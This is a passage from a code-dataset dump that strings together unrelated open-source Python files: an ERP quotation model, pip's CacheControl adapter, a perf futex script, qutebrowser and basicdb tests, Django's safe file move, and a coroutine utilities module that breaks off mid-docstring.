tax = 0
if tax_type == "tax_in":
data["amount_subtotal"] += line["amount"] - tax
else:
data["amount_subtotal"] += line["amount"]
data["amount_total"] = data["amount_subtotal"] + data["amount_tax"]
return data
def onchange_product(self, context):
data = context["data"]
contact_id = data.get("contact_id")
if contact_id:
contact = get_model("contact").browse(contact_id)
else:
contact = None
path = context["path"]
line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
line["description"] = prod.description
line["est_margin_percent_input"] = prod.gross_profit
line["qty"] = 1
if prod.uom_id is not None:
line["uom_id"] = prod.uom_id.id
pricelist_id = data["price_list_id"]
price = None
if pricelist_id:
price = get_model("price.list").get_price(pricelist_id, prod.id, 1)
price_list = get_model("price.list").browse(pricelist_id)
price_currency_id = price_list.currency_id.id
if price is None:
price = prod.sale_price
settings = get_model("settings").browse(1)
price_currency_id = settings.currency_id.id
if price is not None:
currency_id = data["currency_id"]
price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
line["unit_price"] = price_cur
if prod.sale_tax_id is not None:
line["tax_id"] = prod.sale_tax_id.id
data = self.update_amounts(context)
return data
def onchange_qty(self, context):
data = context["data"]
path = context["path"]
line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
pricelist_id = data["price_list_id"]
qty = line["qty"]
if line.get("unit_price") is None:
price = None
if pricelist_id:
price = get_model("price.list").get_price(pricelist_id, prod.id, qty)
price_list = get_model("price.list").browse(pricelist_id)
price_currency_id = price_list.currency_id.id
if price is None:
price = prod.sale_price
settings = get_model("settings").browse(1)
price_currency_id = settings.currency_id.id
if price is not None:
currency_id = data["currency_id"]
price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
line["unit_price"] = price_cur
data = self.update_amounts(context)
return data
def onchange_contact(self, context):
data = context["data"]
contact_id = data.get("contact_id")
if not contact_id:
return {}
contact = get_model("contact").browse(contact_id)
data["payment_terms"] = contact.payment_terms
data["price_list_id"] = contact.sale_price_list_id.id
if contact.currency_id:
data["currency_id"] = contact.currency_id.id
else:
settings = get_model("settings").browse(1)
data["currency_id"] = settings.currency_id.id
return data
def onchange_uom(self, context):
data = context["data"]
path = context["path"]
line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
uom_id = line.get("uom_id")
if not uom_id:
return {}
uom = get_model("uom").browse(uom_id)
if prod.sale_price is not None:
line["unit_price"] = prod.sale_price * uom.ratio / prod.uom_id.ratio
data = self.update_amounts(context)
return data
def copy(self, ids, context):
obj = self.browse(ids)[0]
vals = {
"ref": obj.number,
"contact_id": obj.contact_id.id,
"currency_id": obj.currency_id.id,
"tax_type": obj.tax_type,
"payment_terms": obj.payment_terms,
"other_info": obj.other_info,
"exp_date": obj.exp_date,
"opport_id": obj.opport_id.id,
"lines": [],
}
for line in obj.lines:
line_vals = {
"product_id": line.product_id.id,
"description": line.description,
"qty": line.qty,
"uom_id": line.uom_id.id,
"unit_price": line.unit_price,
"discount": line.discount,
"tax_id": line.tax_id.id,
}
vals["lines"].append(("create", line_vals))
new_id = self.create(vals, context=context)
new_obj = self.browse(new_id)
return {
"next": {
"name": "quot",
"mode": "form",
"active_id": new_id,
},
"flash": "Quotation %s copied from %s" % (new_obj.number, obj.number),
}
def revise(self, ids, context):
obj = self.browse(ids)[0]
res = self.copy(ids, context)
obj.write({"state": "revised"})
return res
def copy_to_sale_order(self,ids,context):
id=ids[0]
obj=self.browse(id)
sale_vals={
"ref": obj.number,
"quot_id": obj.id,
"contact_id": obj.contact_id.id,
"currency_id": obj.currency_id.id,
"tax_type": obj.tax_type,
"lines": [],
"user_id": obj.user_id.id,
"other_info": obj.other_info,
"payment_terms": obj.payment_terms,
"price_list_id": obj.price_list_id.id,
"job_template_id": obj.job_template_id.id,
"est_costs": [],
"currency_rates": [],
}
for line in obj.lines:
if not line.qty or not line.uom_id or not line.unit_price:
continue
prod=line.product_id
line_vals={
"sequence": line.sequence,
"product_id": prod.id,
"description": line.description,
"qty": line.qty,
"uom_id": line.uom_id.id,
"unit_price": line.unit_price if not line.is_hidden else 0,
"discount": line.discount if not line.is_hidden else 0,
"tax_id": line.tax_id.id if not line.is_hidden else None,
"location_id": prod.location_id.id if prod else None,
}
sale_vals["lines"].append(("create",line_vals))
for cost in obj.est_costs:
cost_vals={
"sequence": cost.sequence,
"product_id": cost.product_id.id,
"description": cost.description,
"supplier_id": cost.supplier_id.id,
"list_price": cost.list_price,
"purchase_price": cost.purchase_price,
"purchase_duty_percent": cost.purchase_duty_percent,
"purchase_ship_percent": cost.purchase_ship_percent,
"landed_cost": cost.landed_cost,
"qty": cost.qty,
"currency_id": cost.currency_id.id,
}
sale_vals["est_costs"].append(("create",cost_vals))
for r in obj.currency_rates:
rate_vals={
"currency_id": r.currency_id.id,
"rate": r.rate,
}
sale_vals["currency_rates"].append(("create",rate_vals))
sale_id=get_model("sale.order").create(sale_vals,context=context)
sale=get_model("sale.order").browse(sale_id)
return {
"next": {
"name": "sale",
"mode": "form",
"active_id": sale_id,
},
"flash": "Sale order %s created from quotation %s"%(sale.number,obj.number)
}
def do_won(self, ids, context={}):
for obj in self.browse(ids):
assert obj.state == "approved"
obj.write({"state": "won"})
def do_lost(self, ids, context={}):
for obj in self.browse(ids):
assert obj.state == "approved"
obj.write({"state": "lost"})
def do_reopen(self, ids, context={}):
for obj in self.browse(ids):
assert obj.state in ("won", "lost")
obj.write({"state": "approved"})
def get_state(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
state = obj.state
if state == "approved":
found = False
for sale in obj.sales:
if sale.state in ("confirmed", "done"):
found = True
break
if found:
state = "won"
vals[obj.id] = state
return vals
def view_link(self, ids, context={}):
obj = self.browse(ids)[0]
uuid = obj.uuid
dbname = get_active_db()
return {
"next": {
"type": "url",
"url": "/view_quot?dbname=%s&uuid=%s" % (dbname, uuid),
}
}
def get_template_quot_form(self, ids, context={}):
obj = self.browse(ids)[0]
has_discount=False
for line in obj.lines:
if line.discount:
has_discount=True
if has_discount:
return "quot_form_disc"
else:
return "quot_form"
def to_draft(self, ids, context={}):
obj = self.browse(ids)[0]
obj.write({"state": "draft"})
def get_amount_total_words(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
amount_total_words = utils.num2word(obj.amount_total)
vals[obj.id] = amount_total_words
return vals
def onchange_sequence(self, context={}):
data = context["data"]
seq_id = data["sequence_id"]
if not seq_id:
return None
while 1:
num = get_model("sequence").get_next_number(seq_id, context=context)
res = self.search([["number", "=", num]])
if not res:
break
get_model("sequence").increment_number(seq_id, context=context)
data["number"] = num
return data
def onchange_cost_product(self,context):
data=context["data"]
path=context["path"]
line=get_data_path(data,path,parent=True)
prod_id=line.get("product_id")
if prod_id:
prod=get_model("product").browse(prod_id)
line["description"]=prod.name
line["list_price"]=prod.purchase_price
line["purchase_price"]=prod.purchase_price
line["landed_cost"]=prod.landed_cost
line["qty"]=1
line["uom_id"]=prod.uom_id.id
line["currency_id"]=prod.purchase_currency_id.id
line["purchase_duty_percent"]=prod.purchase_duty_percent
line["purchase_ship_percent"]=prod.purchase_ship_percent
line["landed_cost"]=prod.landed_cost
line["purcase_price"]=prod.purchase_price
if prod.suppliers:
line["supplier_id"]=prod.suppliers[0].supplier_id.id
return data
def get_est_profit(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
cost=0
for line in obj.lines:
cost+=line.est_cost_amount or 0
profit = (obj.amount_subtotal or 0) - cost
margin=profit*100/obj.amount_subtotal if obj.amount_subtotal else None
vals[obj.id] = {
"est_cost_amount": cost,
"est_profit_amount": profit,
"est_margin_percent": margin,
}
return vals
def create_est_costs(self,ids,context={}):
obj=self.browse(ids[0])
del_ids=[]
for cost in obj.est_costs:
if cost.product_id:
del_ids.append(cost.id)
get_model("quot.cost").delete(del_ids)
#obj.write({"est_costs":[("delete_all",)]})
for line in obj.lines:
prod=line.product_id
if not prod:
continue
if not prod.purchase_price:
continue
if not line.sequence:
continue
if "bundle" == prod.type:
continue
vals={
"quot_id": obj.id,
"sequence": line.sequence if not line.is_hidden else line.parent_sequence,
"product_id": prod.id,
"description": prod.name,
"supplier_id": prod.suppliers[0].supplier_id.id if prod.suppliers else None,
"list_price": prod.purchase_price,
"purchase_price": prod.purchase_price,
"landed_cost": prod.landed_cost,
"purchase_duty_percent": prod.purchase_duty_percent,
"purchase_ship_percent": prod.purchase_ship_percent,
"qty": line.qty,
"currency_id": prod.purchase_currency_id.id,
}
get_model("quot.cost").create(vals)
def merge_quotations(self,ids,context={}):
if len(ids)<2:
raise Exception("Can not merge less than two quotations")
contact_ids=[]
currency_ids=[]
tax_types=[]
for obj in self.browse(ids):
contact_ids.append(obj.contact_id.id)
currency_ids.append(obj.currency_id.id)
tax_types.append(obj.tax_type)
contact_ids=list(set(contact_ids))
currency_ids=list(set(currency_ids))
tax_types=list(set(tax_types))
if len(contact_ids)>1:
raise Exception("Quotation customers have to be the same")
if len(currency_ids)>1:
raise Exception("Quotation currencies have to be the same")
if len(tax_types)>1:
raise Exception("Quotation tax types have to be the same")
vals = {
"contact_id": contact_ids[0],
"currency_id": currency_ids[0],
"tax_type": tax_types[0],
"lines": [],
"est_costs": [],
}
seq=0
for obj in self.browse(ids):
seq_map={}
for line in obj.lines:
seq+=1
seq_map[line.sequence]=seq
line_vals = {
"sequence": seq,
"product_id": line.product_id.id,
"description": line.description,
"qty": line.qty,
"uom_id": line.uom_id.id,
"unit_price": line.unit_price,
"discount": line.discount,
"tax_id": line.tax_id.id,
}
vals["lines"].append(("create", line_vals))
for cost in obj.est_costs:
cost_vals={
"sequence": seq_map.get(cost.sequence),
"product_id": cost.product_id.id,
"description": cost.description,
"supplier_id": cost.supplier_id.id,
"list_price": cost.list_price,
"purchase_price": cost.purchase_price,
"landed_cost": cost.landed_cost,
"qty": cost.qty,
"currency_id": cost.currency_id.id,
}
vals["est_costs"].append(("create",cost_vals))
new_id = self.create(vals, context=context)
new_obj = self.browse(new_id)
return {
"next": {
"name": "quot",
"mode": "form",
"active_id": new_id,
},
"flash": "Quotations merged",
}
def onchange_est_margin(self,context={}):
data=context["data"]
path=context["path"]
line=get_data_path(data,path,parent=True)
margin=line["est_margin_percent_input"]
amt=line["est_cost_amount"]/(1-margin/Decimal(100))
price=round(amt/line["qty"])
line["unit_price"]=price
self.update_amounts(context)
return data
def get_relative_currency_rate(self,ids,currency_id):
obj=self.browse(ids[0])
rate=None
for r in obj.currency_rates:
if r.currency_id.id==currency_id:
rate=r.rate
break
if rate is None:
rate_from=get_model("currency").get_rate([currency_id],obj.date) or Decimal(1)
rate_to=obj.currency_id.get_rate(obj.date) or Decimal(1)
rate=rate_from/rate_to
return rate
SaleQuot.register()
| mit |
patrickcurl/ztruck | dj/lib/python2.7/site-packages/pip/_vendor/cachecontrol/adapter.py | 469 | 4196 | import functools
from pip._vendor.requests.adapters import HTTPAdapter
from .controller import CacheController
from .cache import DictCache
from .filewrapper import CallbackFileWrapper
class CacheControlAdapter(HTTPAdapter):
invalidating_methods = set(['PUT', 'DELETE'])
def __init__(self, cache=None,
cache_etags=True,
controller_class=None,
serializer=None,
heuristic=None,
*args, **kw):
super(CacheControlAdapter, self).__init__(*args, **kw)
self.cache = cache or DictCache()
self.heuristic = heuristic
controller_factory = controller_class or CacheController
self.controller = controller_factory(
self.cache,
cache_etags=cache_etags,
serializer=serializer,
)
def send(self, request, **kw):
"""
Send a request. Use the request information to see if it
exists in the cache and cache the response if we need to and can.
"""
if request.method == 'GET':
cached_response = self.controller.cached_request(request)
if cached_response:
return self.build_response(request, cached_response,
from_cache=True)
# check for etags and add headers if appropriate
request.headers.update(
self.controller.conditional_headers(request)
)
resp = super(CacheControlAdapter, self).send(request, **kw)
return resp
def build_response(self, request, response, from_cache=False):
"""
Build a response by making a request or using the cache.
This will end up calling send and returning a potentially
cached response
"""
if not from_cache and request.method == 'GET':
# apply any expiration heuristics
if response.status == 304:
# We must have sent an ETag request. This could mean
# that we've been expired already or that we simply
# have an etag. In either case, we want to try and
# update the cache if that is the case.
cached_response = self.controller.update_cached_response(
request, response
)
if cached_response is not response:
from_cache = True
# We are done with the server response, read a
# possible response body (compliant servers will
# not return one, but we cannot be 100% sure) and
# release the connection back to the pool.
response.read(decode_content=False)
response.release_conn()
response = cached_response
# We always cache the 301 responses
elif response.status == 301:
self.controller.cache_response(request, response)
else:
# Check for any heuristics that might update headers
# before trying to cache.
if self.heuristic:
response = self.heuristic.apply(response)
# Wrap the response file with a wrapper that will cache the
# response when the stream has been consumed.
response._fp = CallbackFileWrapper(
response._fp,
functools.partial(
self.controller.cache_response,
request,
response,
)
)
resp = super(CacheControlAdapter, self).build_response(
request, response
)
# See if we should invalidate the cache.
if request.method in self.invalidating_methods and resp.ok:
cache_url = self.controller.cache_url(request.url)
self.cache.delete(cache_url)
# Give the request a from_cache attr to let people use it
resp.from_cache = from_cache
return resp
def close(self):
self.cache.close()
super(CacheControlAdapter, self).close()
| apache-2.0 |
chrisw957/gumstix-linux | tools/perf/scripts/python/futex-contention.py | 1997 | 1508 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
| gpl-2.0 |
airodactyl/qutebrowser | tests/end2end/features/test_misc_bdd.py | 5 | 1401 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
import json
import pytest_bdd as bdd
bdd.scenarios('misc.feature')
@bdd.then(bdd.parsers.parse('the PDF {filename} should exist in the tmpdir'))
def pdf_exists(quteproc, tmpdir, filename):
path = tmpdir / filename
data = path.read_binary()
assert data.startswith(b'%PDF')
@bdd.when(bdd.parsers.parse('I set up "{lists}" as block lists'))
def set_up_blocking(quteproc, lists, server):
url = 'http://localhost:{}/data/adblock/'.format(server.port)
urls = [url + item.strip() for item in lists.split(',')]
quteproc.set_setting('content.host_blocking.lists', json.dumps(urls))
| gpl-3.0 |
adieu/django-nonrel | django/core/files/move.py | 403 | 2931 | """
Move a file in the safest way possible::
>>> from django.core.files.move import file_move_safe
>>> file_move_safe("/tmp/old_file", "/tmp/new_file")
"""
import os
from django.core.files import locks
try:
from shutil import copystat
except ImportError:
import stat
def copystat(src, dst):
"""Copy all stat info (mode bits, atime and mtime) from src to dst"""
st = os.stat(src)
mode = stat.S_IMODE(st.st_mode)
if hasattr(os, 'utime'):
os.utime(dst, (st.st_atime, st.st_mtime))
if hasattr(os, 'chmod'):
os.chmod(dst, mode)
__all__ = ['file_move_safe']
def _samefile(src, dst):
# Macintosh, Unix.
if hasattr(os.path,'samefile'):
try:
return os.path.samefile(src, dst)
except OSError:
return False
# All other platforms: check for same pathname.
return (os.path.normcase(os.path.abspath(src)) ==
os.path.normcase(os.path.abspath(dst)))
def file_move_safe(old_file_name, new_file_name, chunk_size = 1024*64, allow_overwrite=False):
"""
Moves a file from one location to another in the safest way possible.
First, tries ``os.rename``, which is simple but will break across filesystems.
If that fails, streams manually from one file to another in pure Python.
If the destination file exists and ``allow_overwrite`` is ``False``, this
function will throw an ``IOError``.
"""
# There's no reason to move if we don't have to.
if _samefile(old_file_name, new_file_name):
return
try:
os.rename(old_file_name, new_file_name)
return
except OSError:
# This will happen with os.rename if moving to another filesystem
# or when moving opened files on certain operating systems
pass
# first open the old file, so that it won't go away
old_file = open(old_file_name, 'rb')
try:
# now open the new file, not forgetting allow_overwrite
fd = os.open(new_file_name, os.O_WRONLY | os.O_CREAT | getattr(os, 'O_BINARY', 0) |
(not allow_overwrite and os.O_EXCL or 0))
try:
locks.lock(fd, locks.LOCK_EX)
current_chunk = None
while current_chunk != '':
current_chunk = old_file.read(chunk_size)
os.write(fd, current_chunk)
finally:
locks.unlock(fd)
os.close(fd)
finally:
old_file.close()
copystat(old_file_name, new_file_name)
try:
os.remove(old_file_name)
except OSError, e:
# Certain operating systems (Cygwin and Windows)
# fail when deleting opened files, ignore it. (For the
# systems where this happens, temporary files will be auto-deleted
# on close anyway.)
if getattr(e, 'winerror', 0) != 32 and getattr(e, 'errno', 0) != 13:
raise
| bsd-3-clause |
varunarya10/basicdb | basicdb/tests/test_functional.py | 3 | 10611 | import boto
import boto.exception
import boto.regioninfo
import errno
import os
from multiprocessing import Process, Event
import signal
import testtools as unittest
import basicdb
def run_server(port, server_ready, done):
from coverage.collector import Collector
from coverage.control import coverage
if Collector._collectors:
cov = coverage(data_suffix=True)
cov.start()
def stop_cov(*args):
cov.stop()
cov.save()
raise SystemExit('killed')
else:
def stop_cov(*args):
raise SystemExit('killed')
fp = open('/tmp/null', 'a+')
os.dup2(fp.fileno(), 0)
os.dup2(fp.fileno(), 1)
os.dup2(fp.fileno(), 2)
os.environ['REMOTE_USER'] = 'fake'
from wsgiref.simple_server import make_server
s = make_server('localhost', port, basicdb.app)
signal.signal(signal.SIGINT, stop_cov)
server_ready.set()
s.serve_forever()
class FunctionalTests(object):
def setUp(self):
super(FunctionalTests, self).setUp()
existing_server = os.environ.get('BASICDB_PORT', False)
if not existing_server:
def kill_server():
while True:
try:
os.kill(self.server.pid, signal.SIGINT)
self.server.join(1)
except OSError, e:
if e.errno == errno.ESRCH:
break
raise
self.server_ready = Event()
self.done = Event()
self.server = Process(target=run_server, args=(8000, self.server_ready, self.done))
self.server.start()
self.port = 8000
self.server_ready.wait()
else:
def kill_server():
pass
self.port = int(existing_server)
self.kill_server = kill_server
def tearDown(self):
super(FunctionalTests, self).tearDown()
self.kill_server()
class _BotoTests(FunctionalTests):
def setUp(self):
super(_BotoTests, self).setUp()
local_region = boto.regioninfo.RegionInfo(name='local',
endpoint='localhost')
self.conn = boto.connect_sdb('', '',
region=local_region,
is_secure=False, port=self.port)
def _test_create_list_delete_domains(self):
self.conn.create_domain('test-domain')
self.conn.create_domain('test-domain-2')
domains = self.conn.get_all_domains()
self.assertEquals(len(domains), 2)
self.assertIn('test-domain', set([d.name for d in domains]))
self.assertIn('test-domain-2', set([d.name for d in domains]))
self.conn.delete_domain('test-domain')
domains = self.conn.get_all_domains()
self.assertEquals(len(domains), 1)
self.assertIn('test-domain-2', set([d.name for d in domains]))
self.conn.delete_domain('test-domain-2')
domains = self.conn.get_all_domains()
self.assertEquals(len(domains), 0)
def test_get_domain(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
self.assertIsNot(dom, None)
self.conn.delete_domain('test-domain')
def test_get_domain_metadata(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
domain_meta = self.conn.domain_metadata(dom)
self.conn.delete_domain('test-domain')
def test_add_item(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
item_name = 'ABC_123'
item_attrs = {'Artist': 'The Jackson 5', 'Genera':'Pop'}
retval = dom.put_attributes(item_name, item_attrs)
self.assertEquals(retval, True)
domain_meta = self.conn.domain_metadata(dom)
self.assertEquals(domain_meta.item_count, 1)
self.conn.delete_domain('test-domain')
def test_delete_attrs(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
item_name = 'ABC_123'
item_attrs = {'Artist': 'The Jackson 5', 'Genera':'Pop'}
retval = dom.put_attributes(item_name, item_attrs)
self.assertEquals(retval, True)
dom.delete_attributes(item_name, ['Artist'])
self.assertEquals(dom.get_attributes(item_name),
{'Genera': 'Pop'})
self.conn.delete_domain('test-domain')
def test_add_item_conditionally(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
item_name = 'test-item'
item_attrs = {'attr1': 'attr1val1', 'attr2': 'attr2val1'}
retval = dom.put_attributes(item_name, item_attrs)
self.assertEquals(retval, True)
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': 'attr1val1', 'attr2': 'attr2val1'})
item_attrs = {'attr1': 'attr1val2'}
self.assertRaises(boto.exception.BotoServerError,
dom.put_attributes, item_name, item_attrs,
replace=False, expected_value=('attr1', 'attr1val2'))
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': 'attr1val1', 'attr2': 'attr2val1'},
"Updated value even thought expectations were not met")
self.assertRaises(boto.exception.BotoServerError,
dom.put_attributes, item_name, item_attrs,
replace=False, expected_value=('attr1', False))
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': 'attr1val1', 'attr2': 'attr2val1'},
"Updated value even thought expectations were not met")
retval = dom.put_attributes(item_name, item_attrs,
replace=False, expected_value=('attr1', True))
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': ['attr1val1', 'attr1val2'], 'attr2': 'attr2val1'},
"Did not update value even thought expectations were met")
self.conn.delete_domain('test-domain')
def test_batch_add_items(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain', validate=False)
items = {'item1':{'attr1':'val1'},'item2':{'attr2':'val2'}}
dom.batch_put_attributes(items)
self.assertEquals(dom.get_attributes('item1'), {'attr1': 'val1'})
self.assertEquals(dom.get_attributes('item2'), {'attr2': 'val2'})
self.conn.delete_domain('test-domain')
def test_batch_delete_items(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain', validate=False)
items = {'item1':{'attr1':'val1'},'item2':{'attr2':'val2'}}
dom.batch_put_attributes(items)
items = {'item1':{'attr1':'val2'},'item2':{'attr3':'val3'}}
dom.batch_put_attributes(items, replace=False)
item1_attrs = dom.get_attributes('item1')
self.assertEquals(len(item1_attrs), 1)
self.assertEquals(set(item1_attrs['attr1']), set(["val1", "val2"]))
item2_attrs = dom.get_attributes('item2')
self.assertEquals(item2_attrs, {"attr2": "val2", "attr3": "val3"})
dom.batch_delete_attributes({"item1": {"attr1": "val2"}, "item2": None})
item1_attrs = dom.get_attributes('item1')
self.assertEquals(item1_attrs, {"attr1": "val1"})
def _load_sample_query_data_set(self):
dom = self.conn.create_domain('mydomain')
dom.put_attributes("0385333498",
{"Title": "The Sirens of Titan",
"Author": "Kurt Vonnegut",
"Year": "1959",
"Pages": "00336",
"Keyword": ["Book", "Paperback"],
"Rating": ["*****", "5 stars", "Excellent"]})
dom.put_attributes("0802131786",
{"Title": "Tropic of Cancer",
"Author": "Henry Miller",
"Year": "1934",
"Pages": "00318",
"Keyword": "Book",
"Rating": "****"})
dom.put_attributes("1579124585",
{"Title": "The Right Stuff",
"Author": "Tom Wolfe",
"Year": "1979",
"Pages": "00304",
"Keyword": ["Book", "Hardcover", "American"],
"Rating": ["****", "4 stars"]})
dom.put_attributes("B000T9886K",
{"Title": "In Between",
"Author": "Paul Van Dyk",
"Year": "2007",
"Keyword": ["CD", "Trance"],
"Rating": "4 stars"})
dom.put_attributes("B00005JPLW",
{"Title": "300",
"Author": "Zack Snyder",
"Year": "2007",
"Keyword": ["DVD", "Action", "Frank Miller"],
"Rating": ["***", "3 stars", "Not bad"]})
dom.put_attributes("B000SF3NGK",
{"Title": "Heaven's Gonna Burn Your Eyes",
"Author": "Thievery Corporation",
"Year": "2002",
"Rating": "*****"})
return dom
def test_select(self):
dom = self._load_sample_query_data_set()
res = dom.select("select * from mydomain where Title = 'The Right Stuff'")
for row in res:
print row
class FakeBackedBotoTests(_BotoTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
super(FakeBackedBotoTests, cls).setUpClass()
basicdb.load_backend('fake')
class _FilesystemBackedBotoTests(_BotoTests):
@classmethod
def setUpClass(cls):
super(_FilesystemBackedBotoTests, cls).setUpClass()
basicdb.load_backend('filesystem')
class _RiakBackedBotoTests(_BotoTests):
@classmethod
def setUpClass(cls):
super(_RiakBackedBotoTests, cls).setUpClass()
basicdb.load_backend('riak')
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
epage/DialCentral | dialcentral/util/coroutines.py | 10 | 12377 | #!/usr/bin/env python
"""
Uses for generators
* Pull pipelining (iterators)
* Push pipelining (coroutines)
* State machines (coroutines)
* "Cooperative multitasking" (coroutines)
* Algorithm -> Object transform for cohesiveness (for example context managers) (coroutines)
Design considerations
* When should a stage pass on exceptions or have it thrown within it?
* When should a stage pass on GeneratorExits?
* Is there a way to either turn a push generator into a iterator or to use
comprehensions syntax for push generators (I doubt it)
* When should the stage try and send data in both directions
* Since pull generators (generators), push generators (coroutines), subroutines, and coroutines are all coroutines, maybe we should rename the push generators to not confuse them, like signals/slots? and then refer to two-way generators as coroutines
** If so, make s* and co* implementation of functions
"""
import threading
import Queue
import pickle
import functools
import itertools
import xml.sax
import xml.parsers.expat
def autostart(func):
"""
>>> @autostart
... def grep_sink(pattern):
... print "Looking for %s" % pattern
... while True:
... line = yield
... if pattern in line:
... print line,
>>> g = grep_sink("python")
Looking for python
>>> g.send("Yeah but no but yeah but no")
>>> g.send("A series of tubes")
>>> g.send("python generators rock!")
python generators rock!
>>> g.close()
"""
@functools.wraps(func)
def start(*args, **kwargs):
cr = func(*args, **kwargs)
cr.next()
return cr
return start
@autostart
def printer_sink(format = "%s"):
"""
>>> pr = printer_sink("%r")
>>> pr.send("Hello")
'Hello'
>>> pr.send("5")
'5'
>>> pr.send(5)
5
>>> p = printer_sink()
>>> p.send("Hello")
Hello
>>> p.send("World")
World
>>> # p.throw(RuntimeError, "Goodbye")
>>> # p.send("Meh")
>>> # p.close()
"""
while True:
item = yield
print format % (item, )
@autostart
def null_sink():
"""
Good for uses like with cochain to pick up any slack
"""
while True:
item = yield
def itr_source(itr, target):
"""
>>> itr_source(xrange(2), printer_sink())
0
1
"""
for item in itr:
target.send(item)
@autostart
def cofilter(predicate, target):
"""
>>> p = printer_sink()
>>> cf = cofilter(None, p)
>>> cf.send("")
>>> cf.send("Hello")
Hello
>>> cf.send([])
>>> cf.send([1, 2])
[1, 2]
>>> cf.send(False)
>>> cf.send(True)
True
>>> cf.send(0)
>>> cf.send(1)
1
>>> # cf.throw(RuntimeError, "Goodbye")
>>> # cf.send(False)
>>> # cf.send(True)
>>> # cf.close()
"""
if predicate is None:
predicate = bool
while True:
try:
item = yield
if predicate(item):
target.send(item)
except StandardError, e:
target.throw(e.__class__, e.message)
@autostart
def comap(function, target):
"""
>>> p = printer_sink()
>>> cm = comap(lambda x: x+1, p)
>>> cm.send(0)
1
>>> cm.send(1.0)
2.0
>>> cm.send(-2)
-1
>>> # cm.throw(RuntimeError, "Goodbye")
>>> # cm.send(0)
>>> # cm.send(1.0)
>>> # cm.close()
"""
while True:
try:
item = yield
mappedItem = function(item)
target.send(mappedItem)
except StandardError, e:
target.throw(e.__class__, e.message)
def func_sink(function):
return comap(function, null_sink())
def expand_positional(function):
@functools.wraps(function)
def expander(item):
return function(*item)
return expander
@autostart
def append_sink(l):
"""
>>> l = []
>>> apps = append_sink(l)
>>> apps.send(1)
>>> apps.send(2)
>>> apps.send(3)
>>> print l
[1, 2, 3]
"""
while True:
item = yield
l.append(item)
@autostart
def last_n_sink(l, n = 1):
"""
>>> l = []
>>> lns = last_n_sink(l)
>>> lns.send(1)
>>> lns.send(2)
>>> lns.send(3)
>>> print l
[3]
"""
del l[:]
while True:
item = yield
extraCount = len(l) - n + 1
if 0 < extraCount:
del l[0:extraCount]
l.append(item)
@autostart
def coreduce(target, function, initializer = None):
"""
>>> reduceResult = []
>>> lns = last_n_sink(reduceResult)
>>> cr = coreduce(lns, lambda x, y: x + y, 0)
>>> cr.send(1)
>>> cr.send(2)
>>> cr.send(3)
>>> print reduceResult
[6]
>>> cr = coreduce(lns, lambda x, y: x + y)
>>> cr.send(1)
>>> cr.send(2)
>>> cr.send(3)
>>> print reduceResult
[6]
"""
isFirst = True
cumulativeRef = initializer
while True:
item = yield
if isFirst and initializer is None:
cumulativeRef = item
else:
cumulativeRef = function(cumulativeRef, item)
target.send(cumulativeRef)
isFirst = False
@autostart
def cotee(targets):
"""
Takes a sequence of coroutines and sends the received items to all of them
>>> ct = cotee((printer_sink("1 %s"), printer_sink("2 %s")))
>>> ct.send("Hello")
1 Hello
2 Hello
>>> ct.send("World")
1 World
2 World
>>> # ct.throw(RuntimeError, "Goodbye")
